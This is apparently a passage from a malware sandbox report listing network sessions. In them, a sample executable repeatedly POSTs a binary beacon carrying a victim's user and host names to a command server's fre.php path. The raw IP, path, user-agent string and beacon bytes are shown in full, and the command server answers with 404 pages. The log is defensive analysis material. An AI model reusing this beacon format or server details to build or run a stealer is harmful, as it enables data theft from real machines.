                            Jan 11, 2025 07:44:30.851399899 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:30 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            6192.168.2.54971594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:31.008527040 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:31.013402939 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:31.718381882 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:31 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.54971694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:32.789330959 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:32.794115067 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:33.640239954 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:33 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.54971794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:33.794528961 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:33.799410105 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:34.512341976 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:34 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.54971894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:34.666192055 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:34.671201944 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:35.395987034 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:35 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            10192.168.2.54971994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:35.538367987 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:35.543287992 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:36.266621113 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:36 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            11192.168.2.54972094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:36.435060024 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:36.441283941 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:37.189220905 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:37 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            12192.168.2.54972194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:37.561945915 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:37.566874981 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:38.297092915 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:38 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            13192.168.2.54972294.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:38.449610949 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:38.454562902 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:39.175416946 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:39 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            14192.168.2.54972494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:39.340305090 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:39.345172882 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:40.082995892 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:39 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            15192.168.2.54972594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:40.452266932 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:40.457077980 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:41.166259050 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:41 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            16192.168.2.54973094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:41.326829910 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:41.331671000 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:42.037022114 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:41 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            17192.168.2.54973894.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:42.248599052 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:42.253637075 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:42.933898926 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:42 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            18192.168.2.54974394.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:43.093704939 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:43.098512888 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:43.818480968 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:43 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            19192.168.2.54974994.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:43.975105047 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:43.980050087 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:44.687083006 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:44 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            20192.168.2.54975594.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:44.847551107 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:44.852549076 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:45.559175014 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:45 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            21192.168.2.54976194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:45.723443031 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:45.728632927 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:46.454267979 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:46 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            22192.168.2.54977194.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:46.606229067 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:46.611946106 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:47.314904928 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:47 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            23192.168.2.54977794.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:47.465435028 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:47.470300913 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:48.185899973 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:48 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            24192.168.2.54978494.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:48.338815928 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:48.343699932 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:49.200258970 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:49 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            25192.168.2.54979094.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:49.354667902 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:49.359566927 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
                            Jan 11, 2025 07:44:50.072154045 CET186INHTTP/1.1 404 Not Found
                            Server: nginx/1.26.1
                            Date: Sat, 11 Jan 2025 06:44:49 GMT
                            Content-Type: text/html; charset=utf-8
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a
                            Data Ascii: File not found.


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            26192.168.2.54979694.156.177.41806584C:\Users\user\Desktop\YvVDV4cbjy.exe
                            TimestampBytes transferredDirectionData
                            Jan 11, 2025 07:44:50.217021942 CET245OUTPOST /simple/five/fre.php HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 94.156.177.41
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: A6A8C306
                            Content-Length: 153
                            Connection: close
                            Jan 11, 2025 07:44:50.222646952 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                            Data Ascii: (ckav.rualfons841618ALFONS-PC0FDD42EE188E931437F4FBE2C
